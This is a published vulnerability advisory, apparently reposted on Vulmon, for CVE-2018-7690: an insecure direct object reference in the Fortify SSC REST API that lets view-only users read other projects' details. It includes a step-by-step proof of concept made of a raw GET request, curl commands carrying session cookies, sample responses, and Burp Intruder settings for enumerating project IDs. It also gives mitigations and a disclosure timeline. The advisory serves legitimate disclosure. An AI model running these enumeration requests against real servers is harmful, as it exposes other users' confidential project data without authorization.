Vulmon Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Fortify SSC 17.10 / 17.20 / 18.10 Project Insecure Direct Object Reference

Related Vulnerabilities: CVE-2018-7690  
Publish Date: 13 Dec 2018
Author: Alt3kx
Source 
                Details
================
Software: Fortify SSC (Software Security Center) 
Version: 17.10, 17.20 & 18.10
Homepage: https://www.microfocus.com
Advisory report: https://github.com/alt3kx/CVE-2018-7690 
CVE: CVE-2018-7690
CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE-639

Description
================
Fortify SSC (Software Security Center) REST-API contain Insecure direct object references (IDOR) allowing reading arbitrary details of other user's 
Fortify projects via GET method

Vulnerability
================
Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users
to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER}

Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process. 


Proof of concept
================

Pre-requisites: 

- curl command deployed (Windows or Linux) 
- jq command deployed (for parsing JSON fields), (Windows or Linux) 
- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional) 

Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted), 

The URL normally is avaiable as following: 

Target: https://fortifyserver.com/ssc/#/

Step (2): Once logged extract the Cookie field, the formmat normallly as following: "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default

Step (4): The offending GET is:


GET /ssc/api/v1/projects/2 HTTP/1.1
Host: fortifyserver.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;


Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following: 

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2 

-H "Host: fortifyserver.com" 
-H "Connection: close" 
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" 
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
-H "Accept-Encoding: gzip, deflate" 
-H "Accept-Language: en-US,en;q=0.9" 
-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" 
-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" 
--proxy http://127.0.0.1:8080 | jq '.data'

You should see the following response project details: 

{
  "createdBy": "admin",
  "name": "Project Name Here",
  "description": "",
  "id": 2,
  "creationDate": "2012-08-03T09:43:36.000+0000",
  "issueTemplateId": null
}


Step (6): Now extract all the projects details registered into Fortify SSC server: 

Payload:  https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following: 

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5 

-H "Host: fortifyserver.com" 
-H "Connection: close" 
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" 
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
-H "Accept-Encoding: gzip, deflate" 
-H "Accept-Language: en-US,en;q=0.9" 
-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" 
-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" 
--proxy http://127.0.0.1:8080 | jq '.data'


You should see other project details available as following: 


{
 "createdBy": "alex",
 "name": "Project Name Here",
 "description": "",
 "id": 5,
 "creationDate": "2012-09-21T09:35:16.000+0000",
 "issueTemplateId": null
}


Step (7): Automate with BurpSuite Pro/Free choose: 


Payload Positions: "Intruder Tab -> Positions" highlight as following:


-> /ssc/api/v1/projects/SS1SS

Payloads set: "Intruder Tab -> Payloads" with the following data:


-> Payload set: 1

-> Payload type: Numbers


Payload Options [Numbers]:


-> Type: Sequential

-> From: 0

-> To: 1500

-> Step: 1


Then start attack...

Have fun! 


Mitigations
================
Install the latest patches availabe here:
https://softwaresupport.softwaregrp.com/doc/KM03298201

Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx  (at) protonmail com to acknowledge this report. 

This vulnerability will be published if we do not receive a response to this report with 10 days.

Timeline
================

2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found 
2018-05-31: Vendor feedback received 
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
2018-08-02: Reminder to vendor, feedback received OK!
2018-09-26: Reminder to vendor, feedback received OK!
2018-09-26: Fixes received from the vendor
2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Feedback from the vendor, technical details provided to the researcher
2018-10-16: Fixes now tested on QA environment
2018-11-08: Reminder received from the vendor, feedback provided by researcher
2018-11-09: Re-rest fixes on QA environment
2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
2018-11-21: Researcher feedback
2018-11-23: Fixes working well/confirmed by researcher
2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
2018-11-26: Agreements with the vendor to publish the CVE/Advisory. 
2018-12-12: Public report

Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.

My current exploit list @exploit-db: 
https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook
Vulmon Logo
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started